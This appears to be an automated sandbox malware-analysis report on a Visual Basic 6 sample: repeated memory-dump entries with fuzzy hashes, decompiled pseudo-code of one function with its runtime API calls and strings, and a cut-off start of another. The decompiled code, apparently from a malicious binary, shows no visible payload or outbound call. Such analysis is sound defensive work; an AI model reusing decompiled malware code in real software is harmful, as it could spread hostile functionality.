Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da7bcacc0a70a4991b52cc74daf5cd6da68caaf858fdd0e94074763c5bb274f7
Instruction ID: 11a0547e2a0f5932948f46cb1acc780e2bac9033ef95965dd7de353cafc6d8b4
Opcode Fuzzy Hash: da7bcacc0a70a4991b52cc74daf5cd6da68caaf858fdd0e94074763c5bb274f7
Instruction Fuzzy Hash: DE71BDB6404345ABD7348D189D52BF3B675EFC6B68F44C02FDD4B8EA00E7309A4287A0

Uniqueness

Uniqueness Score: -1.00%

Function 02330C49, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5605637cf0c56a3fff60837bfa8c47d9b83f7affa5c13e881f35d2604ae29de5
Instruction ID: 88e8b7c99f30072fe08c82a6b33797a88dd9a278b7cef0c9e0ee5b3b3f667ea2
Opcode Fuzzy Hash: 5605637cf0c56a3fff60837bfa8c47d9b83f7affa5c13e881f35d2604ae29de5
Instruction Fuzzy Hash: E88137B1A04349DFCB349E34CDA47EA37E7AF95340F95812EDC8A9B214D7358A82CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0233676C, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f38df6359e396603f76e9a407a628bda9945ff6b1bb836d7dc1310ab9a7991
Instruction ID: 507a34cade667db761d0d009af02a08cbd594e51db15206644cfd29957679f2a
Opcode Fuzzy Hash: 29f38df6359e396603f76e9a407a628bda9945ff6b1bb836d7dc1310ab9a7991
Instruction Fuzzy Hash: DF5168760142416EDB241E245D17BF77ABDEFC2BA5F89801FE9C38E904EA2049C38966

Uniqueness

Uniqueness Score: -1.00%

Function 02337345, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47798e6a2f3067381d1e9a1bff2687fcc2e66458365f69ac813d2792d819840
Instruction ID: 4d7394a484eb8fb9417995cb3a340d4fbf518718de3d551b38881de081ceb6f6
Opcode Fuzzy Hash: d47798e6a2f3067381d1e9a1bff2687fcc2e66458365f69ac813d2792d819840
Instruction Fuzzy Hash: 708123B6604349EFDB35CE28CAA17EA76E2AF58754F44812EDC4E9F705D3309A40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02330F6F, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aad9c43416509db80c46dd4c811b1cf6533c8864400f2215bc98e6d3caf4b55
Instruction ID: 890bc7654f4b167ddd6aab631f180da34fb6b188ecdda89862634a39de500c20
Opcode Fuzzy Hash: 6aad9c43416509db80c46dd4c811b1cf6533c8864400f2215bc98e6d3caf4b55
Instruction Fuzzy Hash: 7A5178B6404349ABDB645D285C22BFB7B79EFC2A95F40C01BD9C78F504E63189C386A2

Uniqueness

Uniqueness Score: -1.00%

Function 0233449C, Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aaba1dfe084b2726cde74b4ccf01f63a8f12fddb21b53965f2b6abb4244fb40
Instruction ID: 528a0aa2e2754d6625cd5bff0a7cc8aeeb8bbc4fd871d5a7dd7e4881c90537d7
Opcode Fuzzy Hash: 8aaba1dfe084b2726cde74b4ccf01f63a8f12fddb21b53965f2b6abb4244fb40
Instruction Fuzzy Hash: CD512D766101496ADB315E2C9C15BF73A79FFC2B65F84D017EA8ACE504F6318E834660

Uniqueness

Uniqueness Score: -1.00%

Function 02338E4D, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 007f09b0137a5969e4bb833dae92423c1745064a1fffcaa07ac69e41202e8138
Instruction ID: ffd459d3d52702b1a59f2c3a00575ef3886a217a9d16b2194b0d7654d2e44fed
Opcode Fuzzy Hash: 007f09b0137a5969e4bb833dae92423c1745064a1fffcaa07ac69e41202e8138
Instruction Fuzzy Hash: 27614971600248AFCF359E28DD907EA37B2FF55360F84811AED8A8B654D7318A96CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02339235, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d6be348a34e71c30034e980834f93ab6b541bafa8d267aa6dc36b8e0da71d4
Instruction ID: b7526f397307da682ba030d4170dd18929cfffb57bf98e5ef90cac52e2900f70
Opcode Fuzzy Hash: f3d6be348a34e71c30034e980834f93ab6b541bafa8d267aa6dc36b8e0da71d4
Instruction Fuzzy Hash: 1141367A464149AACB6119285C02BF33A7DFFC3AE9F84D017F6C2CE500ED268DD346A5

Uniqueness

Uniqueness Score: -1.00%

Function 02340F4F, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc712cdbe1383607a07b46d77f48cb557cc65d3432d04bbc76fc3757f40dfaba
Instruction ID: df5c31a434b15e8abff89d6ed197e35d0afd73ded356b64549094a286dee4db3
Opcode Fuzzy Hash: dc712cdbe1383607a07b46d77f48cb557cc65d3432d04bbc76fc3757f40dfaba
Instruction Fuzzy Hash: FB515AB1A04309DFCB259E74C9A57EF77E7AF98340F91811EDC8A6B214D3318A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02340FA6, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6883d52ff48daf31c2d59027d3a1c4477399f7391dbdf9c30316be6d446a1f6
Instruction ID: 2147059161d5f3326cca4c58f80efbd5ce638cfd73feb92e960ab7164b86f292
Opcode Fuzzy Hash: b6883d52ff48daf31c2d59027d3a1c4477399f7391dbdf9c30316be6d446a1f6
Instruction Fuzzy Hash: F1515AB1A04309DFDB259E74C9A57EF77E7AF99340F91811DCC8A6B214D3318A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 023366A3, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8971ccd9d83c85437157645207ed06aea58e84fd5d72fab0456648f6fd454627
Instruction ID: 4100cb658a450a8460ad6fba965a3186ae4254ac6fb546320ec8bcafd78b53b1
Opcode Fuzzy Hash: 8971ccd9d83c85437157645207ed06aea58e84fd5d72fab0456648f6fd454627
Instruction Fuzzy Hash: 0051DE315043419FEB286F348A4A7AABBF6FF41350F5A855EDCC55B525C7349982CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02330EC3, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2053ab177aa2477b5232654287908f0425410a54771019336750fb2c1a03f8
Instruction ID: ff5542c0ae58153a2da496fe39d6fb58b04836685203e7ad404b7865b33ce039
Opcode Fuzzy Hash: 9d2053ab177aa2477b5232654287908f0425410a54771019336750fb2c1a03f8
Instruction Fuzzy Hash: 255128B1A0430ADFDB259E75CCA57EE77E7AF98340F95811ECC896B214D7318A81CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0233446F, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950536371cc5721e251e2952a71b0ccfe83a7127ea3a637d13dc4f975431338c
Instruction ID: 7e10cd58fefe6f84d98e1a1ef2c8a1b0a8790494f865721720812b77d325d8de
Opcode Fuzzy Hash: 950536371cc5721e251e2952a71b0ccfe83a7127ea3a637d13dc4f975431338c
Instruction Fuzzy Hash: 8A41CF76B042899FDB319F68CD487DA37A3FF85740F918029DC8CCB258E7358A828B01

Uniqueness

Uniqueness Score: -1.00%

Function 0233E070, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749abe571dd6dabe37654f5fb1f588416b9edd968ea001c09878c10cc6d9a485
Instruction ID: 5aa9be193099b097ee58c0c9d944db7f4b384a0cb8128d10ef07870d4e83ed9b
Opcode Fuzzy Hash: 749abe571dd6dabe37654f5fb1f588416b9edd968ea001c09878c10cc6d9a485
Instruction Fuzzy Hash: 9631B93170838A9FCB359E78D9D17DA33A2BF6A750F954129DC89CB642E3708986C706

Uniqueness

Uniqueness Score: -1.00%

Function 0233D52B, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd43fc398285e0e96256b9043c10940268db1cf7750f28207d8a1e9e4e0359c
Instruction ID: 310bc28b5d738db56a4f619b61a38ab99c5482835fef661e77eabd3736c5afea
Opcode Fuzzy Hash: dfd43fc398285e0e96256b9043c10940268db1cf7750f28207d8a1e9e4e0359c
Instruction Fuzzy Hash: D6316B7170428E4FDB36CE3889647EA3BA2AF96350F44417DED5C8B241DB74CA82C765

Uniqueness

Uniqueness Score: -1.00%

Function 0233270D, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5d7e77cca1ca64b3482b53b68e59ae134fa5cc6b69a4955abeca41b420a045
Instruction ID: f7ba95e50bc40b6f5eb7ee1aa4c9edf352ff5d75f4ae001c137575ce371b2480
Opcode Fuzzy Hash: 7c5d7e77cca1ca64b3482b53b68e59ae134fa5cc6b69a4955abeca41b420a045
Instruction Fuzzy Hash: D2310831508BCB5ADB32DA3988193EBBFA16F52320F49839ECC994B5D6C3315285C792

Uniqueness

Uniqueness Score: -1.00%

Function 023327E3, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd56f66f4fd2096e99f48b93a84aae69549fc25d2bdb13464954bcc1b1a4ad89
Instruction ID: 06066a9ddba5d4dfddc3db9665cf1736e0a85353282f083409138904d00382c2
Opcode Fuzzy Hash: dd56f66f4fd2096e99f48b93a84aae69549fc25d2bdb13464954bcc1b1a4ad89
Instruction Fuzzy Hash: 47310B316087C756D7329A3C88193EBBFA16F42320F85839ECC99475C6C7315191C792

Uniqueness

Uniqueness Score: -1.00%

Function 023397E2, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63539d1314b2f02e3453cfc4794e85f547ad161f28b3f1dbcca6a36c3b653a6b
Instruction ID: 793bf7a93b9a6f6808ee3426cd899c72b3c10acb27c353e9461fe05093ea63e4
Opcode Fuzzy Hash: 63539d1314b2f02e3453cfc4794e85f547ad161f28b3f1dbcca6a36c3b653a6b
Instruction Fuzzy Hash: CFB092B7701680CFEF02CE08C881B4073B0FB15A84B0904D0E802CBB11D228E900CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0233D812, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 004032C4, Relevance: 89.6, APIs: 49, Strings: 2, Instructions: 361
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E004032C4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				void* _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				signed int _v116;
				intOrPtr _v124;
				char _v132;
				char _v136;
				intOrPtr _v176;
				char* _t106;
				char* _t110;
				char* _t114;
				void* _t116;
				intOrPtr* _t117;
				void* _t118;
				void* _t122;
				intOrPtr* _t123;
				void* _t124;
				void* _t126;
				intOrPtr* _t127;
				void* _t128;
				void* _t130;
				intOrPtr* _t131;
				void* _t132;
				void* _t134;
				intOrPtr* _t135;
				signed char _t136;
				intOrPtr* _t140;
				void* _t141;
				intOrPtr _t174;
				void* _t189;
				intOrPtr* _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t202;
				intOrPtr* _t203;
				intOrPtr* _t204;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr _t210;
				intOrPtr* _t211;
				intOrPtr _t214;
				long long _t234;

				_a4 = _a4 - 0xffff;
				_push(0x4013a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t211 = _t210 - 0x9c;
				_v12 = _t211;
				_v8 = 0x401340;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				_v68 = 0;
				_v84 = 0;
				_v100 = 0;
				_v116 = 0;
				_v132 = 0;
				_v136 = 0;
				L0040159E();
				_t106 =  &_v84;
				_push(_t106);
				_v76 = 0x3076;
				_v84 = 2;
				L00401460();
				asm("sbb esi, esi");
				L00401550();
				if( ~( ~0x00000000) == 0) {
					_t140 = _a4;
					_t189 = 0x40397c;
				} else {
					_t214 =  *0x43039c; // 0x235e9a4
					if(_t214 == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t202 =  *0x43039c; // 0x235e9a4
					_t126 =  *((intOrPtr*)( *_t202 + 0x14))(_t202,  &_v68);
					asm("fclex");
					if(_t126 >= 0) {
						_t189 = 0x40397c;
					} else {
						_push(0x14);
						_t189 = 0x40397c;
						_push(0x40397c);
						_push(_t202);
						_push(_t126);
						L0040158C();
					}
					_t127 = _v68;
					_t203 = _t127;
					_t128 =  *((intOrPtr*)( *_t127 + 0xc0))(_t127,  &_v136);
					asm("fclex");
					if(_t128 >= 0) {
						_t141 = 0x40399c;
					} else {
						_push(0xc0);
						_t141 = 0x40399c;
						_push(0x40399c);
						_push(_t203);
						_push(_t128);
						L0040158C();
					}
					L00401586();
					if( *0x43039c == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t204 =  *0x43039c; // 0x235e9a4
					_t130 =  *((intOrPtr*)( *_t204 + 0x14))(_t204,  &_v68);
					asm("fclex");
					if(_t130 < 0) {
						_push(0x14);
						_push(_t189);
						_push(_t204);
						_push(_t130);
						L0040158C();
					}
					_t131 = _v68;
					_t205 = _t131;
					_t132 =  *((intOrPtr*)( *_t131 + 0xe0))(_t131,  &_v60);
					asm("fclex");
					if(_t132 < 0) {
						_push(0xe0);
						_push(_t141);
						_push(_t205);
						_push(_t132);
						L0040158C();
					}
					_v60 = _v60 & 0x00000000;
					L00401598();
					L00401586();
					if( *0x43039c == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t206 =  *0x43039c; // 0x235e9a4
					_t134 =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  &_v68);
					asm("fclex");
					if(_t134 < 0) {
						_push(0x14);
						_push(_t189);
						_push(_t206);
						_push(_t134);
						L0040158C();
					}
					_t135 = _v68;
					_t207 = _t135;
					_t136 =  *((intOrPtr*)( *_t135 + 0x60))(_t135,  &_v60);
					asm("fclex");
					if(_t136 < 0) {
						_push(0x60);
						_push(_t141);
						_push(_t207);
						_push(_t136);
						L0040158C();
					}
					_v60 = _v60 & 0x00000000;
					L00401598();
					L00401586();
					_t234 =  *0x401338;
					_t140 = _a4;
					_t174 =  *_t140;
					asm("fnstsw ax");
					if((_t136 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v176 = _t234;
					 *_t211 = _v176;
					_t106 =  *((intOrPtr*)(_t174 + 0x84))(_t140, _t174);
					asm("fclex");
					if(_t106 < 0) {
						_push(0x84);
						_push(0x4034b4);
						_push(_t140);
						_push(_t106);
						L0040158C();
					}
				}
				_push(0x403a84);
				_push(0x403a8c);
				L00401532();
				L00401598();
				_push(_t106);
				_push(L"-10-");
				L00401532();
				L00401598();
				_push(_t106);
				_push(0x403bb8);
				L00401532();
				_v76 = _t106;
				_push( &_v84);
				_push( &_v100);
				_v84 = 8;
				L004014D8();
				_push( &_v100);
				_t110 =  &_v132;
				_push(_t110);
				_v124 = 0xa;
				_v132 = 0x8002;
				L004014DE();
				_push( &_v64);
				_push( &_v60);
				_push(2);
				L004014D2();
				_push( &_v100);
				_t114 =  &_v84;
				_push(_t114);
				_push(2);
				L00401562();
				if(_t110 != 0) {
					if( *0x43039c == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t197 =  *0x43039c; // 0x235e9a4
					_t116 =  *((intOrPtr*)( *_t197 + 0x14))(_t197,  &_v68);
					asm("fclex");
					if(_t116 < 0) {
						_push(0x14);
						_push(_t189);
						_push(_t197);
						_push(_t116);
						L0040158C();
					}
					_t117 = _v68;
					_t198 = _t117;
					_t118 =  *((intOrPtr*)( *_t117 + 0xf8))(_t117,  &_v60);
					asm("fclex");
					if(_t118 < 0) {
						_push(0xf8);
						_push(0x40399c);
						_push(_t198);
						_push(_t118);
						L0040158C();
					}
					_v60 = _v60 & 0x00000000;
					L00401598();
					L00401586();
					_push(1);
					_push(1);
					_push(1);
					_push( &_v84);
					L004014CC();
					_push( &_v84);
					L0040156E();
					L00401598();
					L00401550();
					if( *0x43039c == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t199 =  *0x43039c; // 0x235e9a4
					_t122 =  *((intOrPtr*)( *_t199 + 0x14))(_t199,  &_v68);
					asm("fclex");
					if(_t122 < 0) {
						_push(0x14);
						_push(_t189);
						_push(_t199);
						_push(_t122);
						L0040158C();
					}
					_t123 = _v68;
					_t200 = _t123;
					_t124 =  *((intOrPtr*)( *_t123 + 0xf0))(_t123,  &_v60);
					asm("fclex");
					if(_t124 < 0) {
						_push(0xf0);
						_push(0x40399c);
						_push(_t200);
						_push(_t124);
						L0040158C();
					}
					_v60 = _v60 & 0x00000000;
					L00401598();
					L00401586();
					L004014C6();
					_t114 =  *((intOrPtr*)( *_t140 + 0x64))(_t140, _t124);
					asm("fclex");
					if(_t114 < 0) {
						_push(0x64);
						_push(0x4034b4);
						_push(_t140);
						_push(_t114);
						L0040158C();
					}
				}
				_v40 = 0xea8c9360;
				asm("wait");
				_v36 = 0x5b07;
				_push(0x42f320);
				L0040154A();
				L0040154A();
				L0040154A();
				L0040154A();
				L0040154A();
				L0040154A();
				return _t114;
			}

0x004032c4
0x0042ee8c
0x0042ee97
0x0042ee98
0x0042ee9f
0x0042eea8
0x0042eeab
0x0042eeba
0x0042eebd
0x0042eec0
0x0042eec3
0x0042eec6
0x0042eec9
0x0042eecc
0x0042eecf
0x0042eed2
0x0042eed5
0x0042eed8
0x0042eedb
0x0042eede
0x0042eee1
0x0042eee7
0x0042eeec
0x0042eeef
0x0042eef0
0x0042eef7
0x0042eefe
0x0042ef0e
0x0042ef14
0x0042ef1c
0x0042f0c8
0x0042f0cb
0x0042ef22
0x0042ef22
0x0042ef28
0x0042ef2a
0x0042ef2f
0x0042ef34
0x0042ef34
0x0042ef39
0x0042ef46
0x0042ef49
0x0042ef4d
0x0042ef60
0x0042ef4f
0x0042ef4f
0x0042ef51
0x0042ef56
0x0042ef57
0x0042ef58
0x0042ef59
0x0042ef59
0x0042ef65
0x0042ef72
0x0042ef74
0x0042ef7a
0x0042ef7e
0x0042ef94
0x0042ef80
0x0042ef80
0x0042ef85
0x0042ef8a
0x0042ef8b
0x0042ef8c
0x0042ef8d
0x0042ef8d
0x0042ef9c
0x0042efa8
0x0042efaa
0x0042efaf
0x0042efb4
0x0042efb4
0x0042efb9
0x0042efc6
0x0042efc9
0x0042efcd
0x0042efcf
0x0042efd1
0x0042efd2
0x0042efd3
0x0042efd4
0x0042efd4
0x0042efd9
0x0042efe3
0x0042efe5
0x0042efeb
0x0042efef
0x0042eff1
0x0042eff6
0x0042eff7
0x0042eff8
0x0042eff9
0x0042eff9
0x0042f001
0x0042f008
0x0042f010
0x0042f01c
0x0042f01e
0x0042f023
0x0042f028
0x0042f028
0x0042f02d
0x0042f03a
0x0042f03d
0x0042f041
0x0042f043
0x0042f045
0x0042f046
0x0042f047
0x0042f048
0x0042f048
0x0042f04d
0x0042f057
0x0042f059
0x0042f05c
0x0042f060
0x0042f062
0x0042f064
0x0042f065
0x0042f066
0x0042f067
0x0042f067
0x0042f06f
0x0042f076
0x0042f07e
0x0042f083
0x0042f089
0x0042f08c
0x0042f08e
0x0042f092
0x004013ac
0x004013ac
0x0042f098
0x0042f0a5
0x0042f0a9
0x0042f0af
0x0042f0b3
0x0042f0b5
0x0042f0ba
0x0042f0bf
0x0042f0c0
0x0042f0c1
0x0042f0c1
0x0042f0b3
0x0042f0d0
0x0042f0d5
0x0042f0da
0x0042f0e4
0x0042f0e9
0x0042f0ea
0x0042f0ef
0x0042f0f9
0x0042f0fe
0x0042f0ff
0x0042f104
0x0042f109
0x0042f10f
0x0042f113
0x0042f114
0x0042f11b
0x0042f123
0x0042f124
0x0042f127
0x0042f128
0x0042f12f
0x0042f136
0x0042f141
0x0042f145
0x0042f146
0x0042f148
0x0042f150
0x0042f151
0x0042f154
0x0042f155
0x0042f157
0x0042f162
0x0042f16f
0x0042f171
0x0042f176
0x0042f17b
0x0042f17b
0x0042f180
0x0042f18d
0x0042f190
0x0042f194
0x0042f196
0x0042f198
0x0042f199
0x0042f19a
0x0042f19b
0x0042f19b
0x0042f1a0
0x0042f1aa
0x0042f1ac
0x0042f1b2
0x0042f1b6
0x0042f1b8
0x0042f1bd
0x0042f1c2
0x0042f1c3
0x0042f1c4
0x0042f1c4
0x0042f1cc
0x0042f1d3
0x0042f1db
0x0042f1e0
0x0042f1e2
0x0042f1e4
0x0042f1e9
0x0042f1ea
0x0042f1f2
0x0042f1f3
0x0042f1fd
0x0042f205
0x0042f211
0x0042f213
0x0042f218
0x0042f21d
0x0042f21d
0x0042f222
0x0042f22f
0x0042f232
0x0042f236
0x0042f238
0x0042f23a
0x0042f23b
0x0042f23c
0x0042f23d
0x0042f23d
0x0042f242
0x0042f24c
0x0042f24e
0x0042f254
0x0042f258
0x0042f25a
0x0042f25f
0x0042f264
0x0042f265
0x0042f266
0x0042f266
0x0042f26e
0x0042f275
0x0042f27d
0x0042f28a
0x0042f291
0x0042f294
0x0042f298
0x0042f29a
0x0042f29c
0x0042f2a1
0x0042f2a2
0x0042f2a3
0x0042f2a3
0x0042f298
0x0042f2a8
0x0042f2af
0x0042f2b0
0x0042f2b7
0x0042f2f2
0x0042f2fa
0x0042f302
0x0042f30a
0x0042f312
0x0042f31a
0x0042f31f

APIs

__vbaStrCopy.MSVBVM60 ref: 0042EEE7
#592.MSVBVM60(?), ref: 0042EEFE
__vbaFreeVar.MSVBVM60(?), ref: 0042EF14
__vbaNew2.MSVBVM60(0040398C,0043039C,?), ref: 0042EF34
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042EF59
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000C0), ref: 0042EF8D
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000C0), ref: 0042EF9C
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042EFB4
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042EFD4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000E0), ref: 0042EFF9
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000E0), ref: 0042F008
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000E0), ref: 0042F010
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042F028
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042F048
__vbaStrCat.MSVBVM60(00403A8C,00403A84,?), ref: 0042F0DA
__vbaStrMove.MSVBVM60(00403A8C,00403A84,?), ref: 0042F0E4
__vbaStrCat.MSVBVM60(-10-,00000000,00403A8C,00403A84,?), ref: 0042F0EF
__vbaStrMove.MSVBVM60(-10-,00000000,00403A8C,00403A84,?), ref: 0042F0F9
__vbaStrCat.MSVBVM60(00403BB8,00000000,-10-,00000000,00403A8C,00403A84,?), ref: 0042F104
#542.MSVBVM60(?,00000002,00403BB8,00000000,-10-,00000000,00403A8C,00403A84,?), ref: 0042F11B
__vbaVarTstNe.MSVBVM60(?,?,?,00000002,00403BB8,00000000,-10-,00000000,00403A8C,00403A84,?), ref: 0042F136
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000002,00403BB8,00000000,-10-,00000000,00403A8C,00403A84,?), ref: 0042F148
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,00000002,?,?,?,?,?,00000002,00403BB8,00000000,-10-,00000000,00403A8C,00403A84), ref: 0042F157
__vbaNew2.MSVBVM60(0040398C,0043039C,00403A8C,00403A84,?), ref: 0042F17B
__vbaHresultCheckObj.MSVBVM60(00000000,0235E9A4,0040397C,00000014), ref: 0042F19B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042F1C4
__vbaStrMove.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042F1D3
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,000000F8), ref: 0042F1DB
#539.MSVBVM60(00000008,00000001,00000001,00000001), ref: 0042F1EA
__vbaStrVarMove.MSVBVM60(00000008,00000008,00000001,00000001,00000001), ref: 0042F1F3
__vbaStrMove.MSVBVM60(00000008,00000008,00000001,00000001,00000001), ref: 0042F1FD

Strings

v0, xrefs: 0042EEF0
-10-, xrefs: 0042F0EA

Memory Dump Source

Source File: 00000001.00000002.1300993047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1300947769.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1301772553.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1301841364.0000000000432000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1302501500.0000000000473000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeMove$New2$List$#539#542#592Copy
String ID: -10-$v0
API String ID: 3263950706-1872862383
Opcode ID: cefb076924c299ddbe787c802b1898d05d40be0090f1a1b49214bee8b93d3a4f
Instruction ID: f5d43cd4374b218262c4b88d56efc7c9ba1f40d2704b9bc88114823afae7718b
Opcode Fuzzy Hash: cefb076924c299ddbe787c802b1898d05d40be0090f1a1b49214bee8b93d3a4f
Instruction Fuzzy Hash: FDD12071900218BBDB10EB92DC45FAEBBB8BF44708F50453EF446BB1D1DB7899098B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042C7A5, Relevance: 86.1, APIs: 46, Strings: 3, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0042C7A5(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				long long* _v16;
				char _v40;
				char _v44;
				char _v48;
